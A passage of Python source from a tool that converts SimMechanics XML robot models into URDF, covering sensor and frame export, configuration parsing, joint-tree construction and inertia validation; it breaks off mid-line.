ft_sensor_el = generatorURDFSensors.getURDFForceTorque(referenceJoint, sensorName,\n ftSens[\"directionChildToParent\"], frame, urdf_origin_el);\n self.urdf_xml.append(ft_sensor_el);\n\n # for the other sensors, we rely on pose given by a USERADDED frame\n for sensor in self.sensors:\n sensorLink = sensor[\"linkName\"];\n frameName = sensor.get(\"frameName\");\n referenceLink = sensor.get(\"frameReferenceLink\");\n sensorName = sensor.get(\"sensorName\");\n sensorType = sensor.get(\"sensorType\");\n updateRate = sensor.get(\"updateRate\");\n sensorBlobs = sensor.get(\"sensorBlobs\");\n\n self.isValidSensor(sensorType);\n\n if (frameName is None):\n # If frame is not specified, the sensor frame is the link frame\n offset = [0.0, 0.0, 0.0];\n rot = quaternion_from_matrix(numpy.identity(4));\n else:\n # The default referenceLink is the sensorLink itself\n if (referenceLink is None):\n referenceLink = sensorLink;\n\n # Get user added frame\n sensor_frame_fid = self.linkNameDisplayName2fid[(referenceLink, frameName)];\n (offset, rot) = self.tfman.get(\"X\" + sensorLink, sensor_frame_fid)\n\n\n if (sensorName is None):\n sensorName = sensorLink + \"_\" + frameName;\n # Add sensors in Gazebo format\n pose = toGazeboPose(offset, rot);\n\n\n # sys.stderr.write(\"Processing link \" + link['uid'] + \"\\n\")\n\n gazeboSensorType = self.sensorTypeUrdf2sdf.get(sensorType, sensorType);\n\n gazebo_sensor_el = generatorGazeboSensors.getURDFSensor(sensorLink, gazeboSensorType, sensorName, pose,\n updateRate, sensorBlobs)\n\n self.urdf_xml.append(gazebo_sensor_el);\n\n urdf_origin_el = toURDFOriginXMLElement(offset, rot);\n\n # Add sensor in URDF format\n sensor_el = generatorURDFSensors.getURDFSensor(sensorLink, sensorType, sensorName, urdf_origin_el)\n self.urdf_xml.append(sensor_el);\n\n def addOrigin(self):\n # Convert the origin element to Gazebo format (pose tag)\n gazebo_origin_el = lxml.etree.Element(\"gazebo\", None);\n pose = lxml.etree.SubElement(gazebo_origin_el,\"pose\");\n pose.text = 
toGazeboPoseFromEuler(self.originXYZ, self.originRPY);\n\n # Add it to the URDF\n self.urdf_xml.append(gazebo_origin_el);\n\n def parseYAMLConfig(self, configFile):\n \"\"\"Parse the YAML configuration File, if it exists.\n Set the fields the default if the config does\n not set them \"\"\"\n if configFile == None:\n configuration = {}\n else:\n configuration = yaml.load(open(configFile, 'r'))\n if configuration == None:\n configuration = {}\n\n self.freezeList = []\n self.redefinedjoints = {}\n self.assignedCollisionGeometry = {}\n\n self.root = configuration.get('root', None)\n self.extrajoints = configuration.get('extrajoints', {})\n self.extraframes = []\n self.filenameformat = configuration.get('filenameformat', None)\n self.filenameformatchangeext = configuration.get('filenameformatchangeext', None)\n if (self.filenameformat is None and self.filenameformatchangeext is None):\n # if neither filenameformat nor filenameformatchangeext is defined, use the default\n self.filenameformat = '%s'\n if (self.filenameformat is not None and self.filenameformatchangeext is not None):\n #\n print(\"Error: both filenameformat and filenameformatchangeext are defined\")\n assert (False)\n\n self.name = configuration.get('robotName', None)\n\n self.originXYZ = configuration.get('originXYZ', [0.0,0.0,0.0])\n self.originRPY = configuration.get('originRPY', [0.0,0.0,0.0])\n\n epsilon = configuration.get('epsilon', None)\n if (epsilon is not None):\n global _EPS\n _EPS = float(epsilon)\n\n self.forcelowercase = configuration.get('forcelowercase', True)\n\n self.stringToRemoveFromMeshFileName = configuration.get('stringToRemoveFromMeshFileName', False)\n\n ## Frames related options\n\n # If the exportAllUserAdded frame is setted, export all USERADDED frames\n self.exportAllUseradded = configuration.get('exportAllUseradded', False)\n\n # Load the linkFrames\n self.linkFrames = configuration.get('linkFrames', [])\n self.linkFramesMap = {}\n for link_frame in self.linkFrames:\n # add default frameReferenceLink if not included\n if (link_frame.get(\"frameReferenceLink\") is None):\n link_frame[\"frameReferenceLink\"] = link_frame[\"linkName\"];\n self.linkFramesMap[link_frame[\"linkName\"]] = link_frame;\n\n # Get a list of sensors\n self.forceTorqueSensors = configuration.get('forceTorqueSensors', {});\n self.sensors = configuration.get('sensors', {});\n\n # Load the exported frames\n exportedFrames = configuration.get('exportedFrames', [])\n self.exportedFramesMap = {}\n for exported_frame in exportedFrames:\n if (exported_frame.get(\"frameReferenceLink\") is not None):\n self.exportedFramesMap[\n (exported_frame[\"frameReferenceLink\"], exported_frame[\"frameName\"])] = exported_frame;\n else:\n # if the frameReferenceLink is missing, just add the export_frame dict using only the frameName as key:\n # we will add the full tutple (frameReferenceLink,frameName) later\n self.exportedFramesMap[exported_frame[\"frameName\"]] = exported_frame;\n\n\n # Augment the exported frames with sensors for which the exportFrameInURDF option is enabled\n for ftSens in self.forceTorqueSensors:\n if( (ftSens.get(\"exportFrameInURDF\") is not None) and ftSens[\"exportFrameInURDF\"] ):\n if ((ftSens.get(\"frameName\") is None) or (ftSens.get(\"linkName\") is None)):\n print(\"Error: missing frameName or linkName\")\n assert (False)\n exported_frame = {}\n exported_frame[\"frameName\"] = ftSens[\"frameName\"]\n if (ftSens.get(\"exportedFrameName\") is not None):\n exported_frame[\"exportedFrameName\"] = 
ftSens[\"exportedFrameName\"];\n elif(ftSens.get(\"sensorName\") is not None):\n exported_frame[\"exportedFrameName\"] = ftSens[\"sensorName\"];\n else:\n exported_frame[\"exportedFrameName\"] = ftSens[\"jointName\"];\n\n if (ftSens.get(\"frameReferenceLink\") is not None):\n exported_frame[\"frameReferenceLink\"] = ftSens[\"frameReferenceLink\"];\n else:\n exported_frame[\"frameReferenceLink\"] = ftSens[\"linkName\"];\n\n self.exportedFramesMap[\n (exported_frame[\"frameReferenceLink\"], exported_frame[\"frameName\"])] = exported_frame;\n\n\n\n # Get default parameters in \"sensors\" list\n # As we build the list of default sensors, we track the\n # respective references to remove from self.sensors\n sensorsToRemove = [];\n for sensor in self.sensors:\n if (sensor.get(\"sensorName\") == 'default'):\n # for caution, void frame names\n sensor[\"frameName\"] = None;\n sensor[\"exportedFrameName\"] = None;\n # copy parameters\n self.sensorsDefaultMap[sensor.get(\"sensorType\")] = sensor.copy();\n sensorsToRemove.append(sensor);\n\n # Remove default sensor parameters objects from sensors list\n for sensor in sensorsToRemove:\n self.sensors.remove(sensor);\n\n # Go again through the \"sensors\" list and replace unset values by the default ones\n for sensor in self.sensors:\n defaultSensor = self.sensorsDefaultMap.get(sensor.get(\"sensorType\"));\n if (defaultSensor is not None):\n mergedSensor = defaultSensor.copy();\n mergedSensor.update(sensor);\n sensor.update(mergedSensor);\n\n for sensor in self.sensors:\n if (sensor[\"exportFrameInURDF\"]):\n exported_frame = {}\n exported_frame[\"frameName\"] = sensor[\"frameName\"]\n if (sensor.get(\"exportedFrameName\") is not None):\n exported_frame[\"exportedFrameName\"] = sensor[\"exportedFrameName\"];\n else:\n exported_frame[\"exportedFrameName\"] = sensor[\"sensorName\"];\n\n if (sensor.get(\"frameReferenceLink\") is not None):\n exported_frame[\"frameReferenceLink\"] = sensor[\"frameReferenceLink\"];\n else:\n exported_frame[\"frameReferenceLink\"] = sensor[\"linkName\"];\n\n self.exportedFramesMap[\n (exported_frame[\"frameReferenceLink\"], exported_frame[\"frameName\"])] = exported_frame;\n\n # Load scales options\n scale_str = configuration.get('scale', None)\n if (scale_str is not None):\n self.scale = [float(scale_el) for scale_el in scale_str.split()]\n else:\n self.scale = None\n self.freezeAll = configuration.get('freezeAll', False)\n self.baseframe = configuration.get('baseframe', WORLD)\n self.damping_fallback = configuration.get('damping', 0.1)\n self.friction_fallback = configuration.get('friction', None)\n\n self.effort_limit_fallback = configuration.get('effort_limit', 50000)\n self.velocity_limit_fallback = configuration.get('velocity_limit', 50000)\n\n self.rename = configuration.get('rename', {})\n\n # Get map of links for which we explicitly assign the mass\n self.assignedMasses = configuration.get('assignedMasses', {})\n self.assignedColors = configuration.get('assignedColors', {})\n\n # Get map of links for which we explicitly assign the mass\n self.assignedInertiasMap = {}\n assignedInertiasVector = configuration.get('assignedInertias', {})\n for el in assignedInertiasVector:\n link = el[\"linkName\"]\n self.assignedInertiasMap[link] = el;\n\n # Get map of links for which we explicitly assign the collision geometry\n assignedCollisionGeometryVector = configuration.get('assignedCollisionGeometry', {})\n for el in assignedCollisionGeometryVector:\n link = el[\"linkName\"]\n self.assignedCollisionGeometry[link] = el;\n\n # Get 
lists converted to strings\n self.removeList = configuration.get('remove', {})\n self.freezeList = [str(e) for e in configuration.get('freeze', [])]\n\n # Get map with key converted to strings\n jointmap = configuration.get('redefinedjoints', {})\n for x in jointmap.keys():\n self.redefinedjoints[str(x)] = jointmap[x]\n\n # Add Extra Frames\n for frame in configuration.get('moreframes', []):\n self.tfman.add(frame['offset'], frame['orientation'], frame['parent'], frame['child'])\n\n # SimMechanics bug inertia workaround\n mirroredInertia = configuration.get('mirroredInertia', [])\n self.mirroredInertiaMap = {}\n for mirrored_link_dict in mirroredInertia:\n mirroredLink = mirrored_link_dict[\"mirroredLink\"]\n self.mirroredInertiaMap[mirroredLink] = mirrored_link_dict;\n\n self.inertiaWorkaround = configuration.get('inertiaWorkaround', None);\n if (self.inertiaWorkaround is not None):\n self.mirroredLinks = self.inertiaWorkaround[\"mirroredLinks\"].split()\n else:\n self.mirroredLinks = None;\n\n # Get a list of joints for which we want to invert the rotation axis direction\n self.reverseRotationAxis = configuration.get('reverseRotationAxis', []);\n\n # Get a list of blob of XML tags to add to the URDF\n self.XMLBlobs = configuration.get(\"XMLBlobs\", [])\n\n def parseJointCSVConfig(self, configFile):\n \"\"\"Parse the CSV configuration File, if it exists.\"\"\"\n self.joint_configuration = {}\n if configFile is not None:\n with open(configFile, 'r') as csvfile:\n my_dialect = csv.Sniffer().sniff(csvfile.read(1024))\n csvfile.seek(0)\n reader = csv.DictReader(csvfile, dialect=my_dialect)\n for row in reader:\n self.joint_configuration[row[\"joint_name\"]] = row\n\n def parse(self, element):\n \"\"\"Recursively goes through all XML elements\n and branches off for important elements\"\"\"\n name = element.localName\n # Grab name from root element AND recursively parse\n if name == \"PhysicalModelingXMLFile\":\n dict = getDictionary(element)\n if (self.name is None):\n self.name = dict['name']\n\n if name == \"Body\":\n self.parseLink(element)\n elif name == \"SimpleJoint\":\n self.parseJoint(element)\n elif name == \"Ground\":\n dict = getDictionary(element)\n self.parseFrames(dict['frame'], \"GROUND\")\n else:\n for child in element.childNodes:\n self.parse(child)\n\n def parseLink(self, link):\n \"\"\"Parse the important bits of a link element\"\"\"\n linkdict = getDictionary(link)\n uid = self.getName(linkdict['name'])\n linkdict['uid'] = uid;\n linkdict['neighbors'] = []\n linkdict['children'] = []\n linkdict['jointmap'] = {}\n\n # Save the frames for separate parsing\n frames = linkdict['frames']\n linkdict['frames'] = None\n\n # Save the color if it exists\n if 'MaterialProp' in linkdict:\n # color\n colorelement = linkdict['MaterialProp'][1]\n color = colorelement.childNodes[0].data\n # ambient\n ambientelement = linkdict['MaterialProp'][3]\n ambient = ambientelement.childNodes[0].data\n linkdict['ambient'] = float(ambient);\n # diffuse\n diffuseelement = linkdict['MaterialProp'][5]\n diffuse = diffuseelement.childNodes[0].data\n linkdict['diffuse'] = float(diffuse);\n # specular\n specularelement = linkdict['MaterialProp'][7]\n specular = specularelement.childNodes[0].data\n linkdict['specular'] = float(specular);\n # transparency\n transparencyelement = linkdict['MaterialProp'][11]\n transparency = transparencyelement.childNodes[0].data\n linkdict['color'] = list(map(float, color.split(\",\"))) + [1.0 - float(transparency)]\n\n linkdict['MaterialProp'] = None\n\n self.links[uid] = 
linkdict\n self.parseFrames(frames, uid)\n\n # Save First Actual Element as Root, if not defined already\n if self.root == None and \"geometryFileName\" in linkdict:\n self.root = uid\n\n def parseFrames(self, frames, parent_link):\n \"\"\"Parse the frames from xml\"\"\"\n for frame in frames:\n if frame.nodeType is frame.TEXT_NODE:\n continue\n fdict = getDictionary(frame)\n # We don't identify frames with ref attribute because USERADDED\n # frames don't have ref attributes. We always use instead the\n # urdf_link + name scheme (note that for added frames simmechanics link\n # is different from urdf_link\n fid = parent_link + fdict['name']\n\n # for using the ref numbers of the frame we build a map from the ref numbers\n # to the names\n # fid = str(frame.getAttribute(\"ref\"))\n ref = str(frame.getAttribute(\"ref\"))\n\n self.ref2nameMap[ref] = fid;\n\n fdict['parent'] = parent_link\n\n offset = getlist(fdict['position'])\n\n # for models mirrored in Creo there is a strange bug\n # in SimMechanics Link that causes the inertia of the\n # mirrored links to be wrongly placed. We add here\n # some specific workaround for those link, if this\n # is requested in the YAML file\n if (self.mirroredLinks is not None):\n if (fdict['name'] == 'CG' and parent_link in self.mirroredLinks):\n offset[2] = -offset[2];\n\n units = fdict['positionUnits']\n for i in range(0, len(offset)):\n offset[i] = convert(offset[i], units)\n\n orientation = getlist(fdict['orientation'])\n quat = matrixToQuaternion(orientation)\n # If the frame does not have a reference number,\n # use the name plus a suffix (for CG or CS1...\n # If the frame does not have a reference number,\n # but it is a USERADDED frame (frame added on the CAD\n # for export in simmechanics) and the exportAllUserAdded\n # option is set to True, export the frame using the displayName tag\n # otherwise ignore the frame\n if fdict['nodeID'].endswith('(USERADDED)'):\n useradded_frame_name = fdict['displayName']\n\n # clean all possible exportedFrames that were missing the frameReferenceLink option\n if useradded_frame_name in self.exportedFramesMap.keys():\n buf_export_frame = self.exportedFramesMap[useradded_frame_name]\n buf_export_frame[\"frameRefenceLink\"] = parent_link;\n self.exportedFramesMap[(parent_link, useradded_frame_name)] = buf_export_frame;\n\n # Frame is added if exportAllUseradded is setted or\n # if frame is part of exportedFrames structure\n if self.exportAllUseradded or () or (\n (parent_link, useradded_frame_name) in self.exportedFramesMap.keys()):\n map_key = (parent_link, useradded_frame_name);\n if (map_key in self.exportedFramesMap.keys()):\n if (\"exportedFrameName\" in self.exportedFramesMap[map_key].keys()):\n useradded_frame_name = self.exportedFramesMap[map_key][\"exportedFrameName\"];\n if (\"additionalTransformation\" in self.exportedFramesMap[map_key].keys()):\n addTransform = self.exportedFramesMap[map_key][\"additionalTransformation\"];\n\n if (addTransform is not None):\n assert(len(addTransform) is 6)\n sensorOriginal_R_sensorModifed = euler_matrix(addTransform[3], addTransform[4], addTransform[5])\n link_R_sensorOriginal = quaternion_matrix(quat)\n offset = numpy.add(offset, numpy.matmul(link_R_sensorOriginal[0:3,0:3], addTransform[0:3]))\n quat = quaternion_from_matrix(numpy.matmul(link_R_sensorOriginal, sensorOriginal_R_sensorModifed))\n fid = useradded_frame_name + \"CS1\"\n extraframe = {'parentlink': parent_link, 'framename': useradded_frame_name}\n self.extraframes = self.extraframes + [extraframe]\n # add 
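\n # Editor-added sketch (not from the original): the additionalTransformation\n # composition above in isolation. addT = [x, y, z, roll, pitch, yaw] shifts\n # the frame by an offset expressed in the original frame axes and then\n # post-rotates it (all values here are hypothetical):\n #\n # addT = [0.0, 0.0, 0.1, 0.0, 0.0, 1.5707963]\n # link_R_orig = quaternion_matrix(quat)\n # offset = numpy.add(offset, numpy.matmul(link_R_orig[0:3, 0:3], addT[0:3]))\n # orig_R_mod = euler_matrix(addT[3], addT[4], addT[5])\n # quat = quaternion_from_matrix(numpy.matmul(link_R_orig, orig_R_mod))\n #\n # add 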
link to self.links structure\n linkdict = {}\n linkdict['name'] = useradded_frame_name\n fdict['parent'] = useradded_frame_name\n linkdict['neighbors'] = []\n linkdict['children'] = []\n linkdict['jointmap'] = {}\n linkdict['frames'] = None\n linkdict['uid'] = linkdict['name']\n self.links[useradded_frame_name] = linkdict\n\n # Storing the displayName to the fid of the frame, to retrive the USERADDED frame when assigning link frames\n self.linkNameDisplayName2fid[(parent_link, fdict['displayName'])] = fid;\n\n self.tfman.add(offset, quat, WORLD, fid)\n self.frames[fid] = fdict\n\n def parseJoint(self, element):\n \"\"\"Parse the joint from xml\"\"\"\n dict = getDictionary(element)\n joint = {}\n joint['name'] = dict['name']\n uid = self.getName(joint['name'])\n\n frames = element.getElementsByTagName(\"Frame\")\n ref_parent = str(frames[0].getAttribute(\"ref\"))\n ref_child = str(frames[1].getAttribute(\"ref\"))\n\n joint['ref_parent'] = ref_parent\n joint['ref_child'] = ref_child\n type = element.getElementsByTagName(\"Primitive\")\n\n # If there multiple elements, assume a fixed joint\n # \\todo TODO fix and remove this assumption\n if len(type) == 1:\n pdict = getDictionary(type[0])\n joint['type'] = pdict['name']\n joint['axis'] = pdict['axis']\n joint['axisReferenceFrame'] = pdict['referenceFrame']\n if joint['type'] == 'weld':\n joint['type'] = 'fixed'\n else:\n joint['type'] = 'fixed'\n\n # Ignore joints on the remove list\n # print(\"Parsing joint \" + joint['name'])\n # print(\"Removelist: \")\n # print(self.removeList)\n if (uid in self.removeList) or (joint['name'] in self.removeList):\n # print(joint['name']+\" is in removelist\")\n return\n\n # Force joints to be fixed on the freezeList\n if (uid in self.freezeList) or (joint['name'] in self.freezeList) or self.freezeAll:\n joint['type'] = 'fixed'\n\n # Redefine specified joints on redefined list\n if joint['ref_parent'] in self.redefinedjoints.keys():\n jdict = self.redefinedjoints[joint['ref_parent']]\n if 'name' in jdict:\n uid = jdict['name']\n\n # Default to continuous joints\n joint['type'] = jdict.get('type', 'continuous')\n\n if 'axis' in jdict:\n # print(\"axis\" + str(jdict['axis']))\n joint['axis'] = jdict['axis']\n joint['axisReferenceFrame'] = jdict['referenceFrame']\n if 'limits' in jdict:\n joint['limits'] = jdict['limits']\n\n # If some limits are defined in the CSV joint configuration file load them\n\n\n # if the joint is revolute but no limits are defined, switch to continuous\n if 'limits' not in joint.keys() and joint['type'] == \"revolute\":\n joint['type'] = \"continuous\";\n\n self.joints[uid] = joint\n\n def buildTree(self, root):\n \"\"\"Reduce the graph structure of links and joints to a tree\n by breadth first search. 
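Each link keeps the parent through which it was first reached, so any loop\n in the SimMechanics connectivity graph is broken rather than duplicated.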
Then construct new coordinate frames\n from new tree structure\"\"\"\n\n # resolve the undefined reference for all the joints\n for jid in self.joints:\n jointdict = self.joints[jid]\n if ('parent' not in jointdict.keys()):\n jointdict['parent'] = self.ref2nameMap[jointdict['ref_parent']]\n if ('child' not in jointdict.keys()):\n jointdict['child'] = self.ref2nameMap[jointdict['ref_child']]\n\n # Find the real rootLink\n if (jointdict['parent'].startswith('RootPart') and jointdict['type'] == 'fixed'):\n if (self.realRootLink is not None):\n pass\n # print(\"[WARN] multiple links attached to the RootPart, please open an issue with your model\")\n # print(\" at https://github.com/robotology-playground/simmechanics-to-urdf/issues/new\")\n else:\n self.realRootLink = self.getLinkNameByFrame(jointdict['child'])\n\n # Some postprocessing that was not possible to do while parsing\n for extraframe in self.extraframes:\n pid = extraframe['parentlink']\n # Some USERADDED frames could be attached to the dummy root RootPart\n # In this case substitute the dummy root with the real first link\n # attached to the RootPart with a fixed link\n if pid == 'RootPart':\n extraframe['parentlink'] = self.realRootLink\n # notice that we can disregard the original parent frame\n # of the joint because it is a fixed joint\n\n # Add necessary information for any frame in the SimMechanics XML\n # file that we want to save to URDF. Given that URDF does not\n # have a frame concept at all, we are bound to create \"dummy\"\n # links and joints to express the notion of frames\n for extraframe in self.extraframes:\n pid = extraframe['parentlink']\n cid = extraframe['framename']\n\n joint_name = cid + \"_fixed_joint\";\n\n self.links[pid]['neighbors'].append(cid)\n self.links[pid]['jointmap'][cid] = joint_name\n self.links[cid]['neighbors'].append(pid)\n self.links[cid]['jointmap'][pid] = joint_name\n self.joints[joint_name] = {'name': joint_name, 'parent': pid + 'CS1', 'child': cid + 'CS1', 'type': 'fixed'}\n # for (k,v) in extraframe['attributes'].items():\n # self.links[cid][k] = v\n\n # Create a list of all neighboring links at each link\n for jid in self.joints:\n jointdict = self.joints[jid]\n if \"Root\" in jointdict['name']:\n continue\n pid = self.getLinkNameByFrame(jointdict['parent'])\n cid = self.getLinkNameByFrame(jointdict['child'])\n parent = self.links[pid]\n child = self.links[cid]\n\n parent['neighbors'].append(cid)\n parent['jointmap'][cid] = jid\n child['neighbors'].append(pid)\n child['jointmap'][pid] = jid\n\n # import pprint\n # pp = pprint.PrettyPrinter(indent=4)\n # pp.pprint(self.joints)\n\n\n # Add necessary information for any user-defined joints\n for (name, extrajoint) in self.extrajoints.items():\n pid = extrajoint['pid']\n cid = extrajoint['cid']\n jorigin = extrajoint['jorigin']\n newframe = name + \"_frame\"\n\n self.links[pid]['neighbors'].append(cid)\n self.links[pid]['jointmap'][cid] = name\n self.links[cid]['neighbors'].append(pid)\n self.links[cid]['jointmap'][pid] = name\n self.joints[name] = {'name': name, 'parent': jorigin, 'child': newframe}\n for (k, v) in extrajoint['attributes'].items():\n self.joints[name][k] = v\n self.frames[jorigin] = {'parent': pid}\n self.frames[newframe] = {'parent': cid}\n\n # Starting with designated root node, perform BFS to\n # create the tree\n queue = [root]\n self.links[root]['parent'] = \"GROUND\"\n while len(queue) > 0:\n id = queue.pop(0)\n link = self.links[id]\n for n in link['neighbors']:\n nbor = self.links[n]\n # if a neighbor has not been 
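\n # Editor-added sketch (not from the original): the queue-based walk above,\n # reduced to a hypothetical three-link graph:\n #\n # neighbors = {'a': ['b', 'c'], 'b': ['a'], 'c': ['a']}\n # parent, queue = {'a': None}, ['a']\n # while queue:\n # lid = queue.pop(0)\n # for n in neighbors[lid]:\n # if n not in parent: # first visit wins, exactly as below\n # parent[n] = lid\n # queue.append(n)\n # assert parent == {'a': None, 'b': 'a', 'c': 'a'}\n #\n # if a neighbor has not been 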
visited yet,\n # add it as a child node\n if not 'parent' in nbor:\n nbor['parent'] = id\n queue.append(n)\n link['children'].append(n)\n\n # build new link coordinate frames\n # URDF has the unconvenient requirement that the link frame\n # origin should be placed in the axis of the parent joint,\n # so we have to place special care in\n for id in self.links:\n\n link = self.links[id]\n if not 'parent' in link:\n continue\n parentid = link['parent']\n jointIsNotFixed = True\n if parentid == \"GROUND\":\n ref = self.baseframe\n else:\n joint = self.joints[link['jointmap'][parentid]]\n ref = joint['parent']\n if (joint['type'] == 'fixed'):\n jointIsNotFixed = False\n # If a frame is not fixed, then the default link frame\n # has the orientation of the link \"CS1\" frame and the origin\n # of the joint.\n # However using the linkFrames options is possible to use an\n # USERADDED frame as the linkFrame. Given that the URDF enforces\n # the link frame origin to lay on the axis of parent joint, the USERADDED\n # frame is used unmodified only if its origin lays on joint axis.\n # If the USERADDED frame origin doesn't lay on the joint axis, an exception is thrown.\n if (jointIsNotFixed and not (parentid == \"GROUND\")):\n if (self.linkFramesMap.get(link['uid']) is None):\n # no frame redefinition\n (off1, rot1) = self.tfman.get(WORLD, ref)\n (off2, rot2) = self.tfman.get(WORLD, id + \"CS1\")\n self.tfman.add(off1, rot2, WORLD, \"X\" + id)\n else:\n # using a useradded frame\n new_link_frame_fid = self.linkNameDisplayName2fid[(\n self.linkFramesMap[link['uid']][\"frameReferenceLink\"],\n self.linkFramesMap[link['uid']][\"frameName\"])];\n (new_link_frame_off, new_link_frame_rot) = self.tfman.get(WORLD, new_link_frame_fid)\n (joint_offset, joint_rot) = self.tfman.get(WORLD, ref)\n # get axis for the parent joint\n jointdict = self.joints[link['jointmap'][parentid]]\n jointdict_axis = jointdict['axis'];\n axis_string = jointdict_axis.replace(',', ' ')\n axis = [float(axis_el) for axis_el in axis_string.split()]\n\n axis_np = numpy.array(axis)\n joint_offset_np = numpy.array(joint_offset)\n new_link_frame_off_np = numpy.array(new_link_frame_off);\n\n axis_normalized = axis_np / numpy.linalg.norm(axis_np);\n\n # Check that the USERADDED frame origin lays on the joint axis\n joint_frame_to_new_link_frame_vector = new_link_frame_off_np - joint_offset_np;\n cross_axis_vector = numpy.cross(joint_frame_to_new_link_frame_vector, axis_normalized);\n if (numpy.any(numpy.absolute(cross_axis_vector) > _EPS)):\n raise Exception('The frame: ', self.linkFramesMap[link['uid']][\"frameName\"],\n ' doesn t lay on the joint axis.')\n\n self.tfman.add(new_link_frame_off, new_link_frame_rot, WORLD, \"X\" + id)\n\n else:\n # If the parent joint is fixed, the URDF format does not\n # default we use enforce any constraint on the frame placement\n # and we use the id+\"CS1\" frame as the link frame.\n # The frame of the link attached with a fixed joint\n # can be optionally set to a USERADDED frame using the\n # linkFrames options\n if (link['uid'] in self.linkFramesMap.keys()):\n new_link_frame_fid = self.linkNameDisplayName2fid[(\n self.linkFramesMap[link['uid']][\"frameReferenceLink\"],\n self.linkFramesMap[link['uid']][\"frameName\"])];\n (off, rot) = self.tfman.get(WORLD, new_link_frame_fid)\n self.tfman.add(off, rot, WORLD, \"X\" + id)\n else:\n if (parentid == \"GROUND\"):\n # be consistent with the old behaviour\n (off1, rot1) = self.tfman.get(WORLD, ref)\n (off2, rot2) = self.tfman.get(WORLD, id + \"CS1\")\n 
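# Editor-added note: the link frame \"X\" + id takes its origin from the\n # reference frame (off1) and its orientation from the link's CS1 frame (rot2).\n 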
self.tfman.add(off1, rot2, WORLD, \"X\" + id)\n else:\n # If nothing special happens, use CS1 as link frame\n (off, rot) = self.tfman.get(WORLD, id + \"CS1\")\n self.tfman.add(off, rot, WORLD, \"X\" + id)\n\n def output(self, rootid):\n \"\"\"Creates the URDF from the parsed document.\n Makes the document and starts the recursive build process\"\"\"\n self.result = urdf_parser_py.urdf.URDF(self.name)\n self.outputLink(rootid)\n self.processLink(rootid)\n\n def processLink(self, id):\n \"\"\" Creates the output for the specified node's\n child links, the connecting joints, then\n recursively processes each child \"\"\"\n link = self.links[id]\n for cid in link['children']:\n jid = link['jointmap'][cid]\n\n self.outputLink(cid)\n self.outputJoint(jid, id)\n self.processLink(cid)\n\n def isValidURDFInertia(self, inertia, tol):\n inertiaMatrix = numpy.zeros([3, 3]);\n inertiaMatrix[0, 0] = inertia.ixx;\n inertiaMatrix[0, 1] = inertia.ixy;\n inertiaMatrix[0, 2] = inertia.ixz;\n inertiaMatrix[1, 0] = inertia.ixy;\n inertiaMatrix[1, 1] = inertia.iyy;\n inertiaMatrix[1, 2] = inertia.iyz;\n inertiaMatrix[2, 0] = inertia.ixz;\n inertiaMatrix[2, 1] = inertia.iyz;\n inertiaMatrix[2, 2] = inertia.izz;\n\n return self.isValidInertiaMatrix(inertiaMatrix, tol);\n\n def isValidInertiaMatrix(self, inertia, tol):\n \"\"\"Check that a matrix is a valid inertia matrix:\n * Check simmetry\n * Check positive definitess\n * Check triangular inequality of eigen values\"\"\"\n # Check simmetry\n deter = numpy.linalg.det(inertia)\n if (abs((inertia[0, 1] - inertia[1, 0]) / deter) > tol or\n abs((inertia[0, 2] - inertia[2, 0]) / deter) > tol or\n abs((inertia[1, 2] - inertia[2, 1]) / deter) > tol):\n sys.stderr.write(\n \"Inertia: \" + str(inertia) + \" is not a valid Inertia matrix because it is not simmetric.\\n\");\n return False;\n\n # Compute eigenvalues\n [s, v] = numpy.linalg.eig(inertia)\n if ((s[0]) / deter < tol or\n (s[1]) / deter < tol or\n (s[2]) / deter < tol):\n sys.stderr.write(\"Inertia: \" + str(\n inertia) + \" is not a valid Inertia matrix because it has negative inertias on the principal axis.\\n\");\n return False;\n\n # Check triangle inequality\n if (((s[0] + s[1] - s[2]) / deter < tol) or\n ((s[1] + s[2] - s[0]) / deter < tol) or\n ((s[0] + s[2] - s[1]) / deter < tol)):\n sys.stderr.write(\"Inertia: \" + str(\n inertia) + \" is not a valid Inertia matrix because it does not respect the triangle inequality.\\n\");\n return False;\n\n return True;\n\n def isValidSensor(self, sensorType):\n \"\"\" Checks if the specified sensor type is supported \"\"\"\n\n self.sensorIsValid = sensorType in SENSOR_TYPES\n if not self.sensorIsValid:\n raise TypeError('The sensor type ', sensorType, 'specified in the *.yaml file, is not supported.')\n\n def isValidGeometricShape(self, geometricShapeData):\n \"\"\" Checks if the specified Geometric shape is supported and correctly defined \"\"\"\n\n geometricShape = geometricShapeData[\"geometricShape\"]\n shape = geometricShape[\"shape\"]\n supportedShapes = GEOMETRIC_SHAPES.keys()\n geometricShapeIsValid = shape in supportedShapes\n if not geometricShapeIsValid:\n sys.stderr.write(\"Shape: '\" + shape + \"' is not supported.\\n\");\n sys.stderr.write(\"The following shapes are supported: \" + ','.join(supportedShapes) + \".\\n\");\n return False;\n\n geometricShapeIsCorrectlyDefined = True\n shapeRequiredParameters = GEOMETRIC_SHAPES[shape]\n for parameter in shapeRequiredParameters:\n geometricShapeIsCorrectlyDefined = geometricShapeIsCorrectlyDefined and 
(parameter in geometricShape.keys())\n if not geometricShapeIsCorrectlyDefined:\n sys.stderr.write(\"The parameters of the shape: '\" + shape + \"' are not correctly defined.\\n\");\n sys.stderr.write(\"The following parameters are required: \" + ','.join(shapeRequiredParameters) + \".\\n\");\n return False;\n\n return True\n\n def outputLink(self, id):\n \"\"\" Creates the URDF output for a single link \"\"\"\n\n linkdict = self.links[id]\n if linkdict['name'] == \"RootPart\":\n return\n\n if ('geometryFileName' in linkdict.keys()):\n ##############################################################\n ### Define Geometry (if this is not a fake link, i.e. a frame)\n ##############################################################\n visual = urdf_parser_py.urdf.Visual()\n collision = urdf_parser_py.urdf.Collision()\n\n filename = linkdict['geometryFileName']\n if self.forcelowercase:\n filename = filename.lower()\n\n if self.stringToRemoveFromMeshFileName:\n filename = filename.replace(self.stringToRemoveFromMeshFileName, '')\n\n if (self.filenameformat is not None):\n filename = self.filenameformat % filename\n else:\n filenameNoExt = os.path.splitext(filename)[0]\n filename = self.filenameformatchangeext % filenameNoExt\n\n visual.geometry = urdf_parser_py.urdf.Mesh(filename, self.scale)\n\n # Visual offset is difference between origin and CS1\n (off, rot) = self.tfman.get(\"X\" + id, id + \"CS1\")\n rpy = list(euler_from_quaternion(rot))\n visual.origin = urdf_parser_py.urdf.Pose(zero(off), zero(rpy))\n\n if (id in self.assignedCollisionGeometry):\n # in this case the mesh will not be used as the\n # collision geometry. Instead, a simple shape will\n # be used.\n geometricShapeData = self.assignedCollisionGeometry[id]\n assert (self.isValidGeometricShape(geometricShapeData))\n geometricShape = geometricShapeData[\"geometricShape\"]\n collisionOriginVector = [float(scale_el) for scale_el in 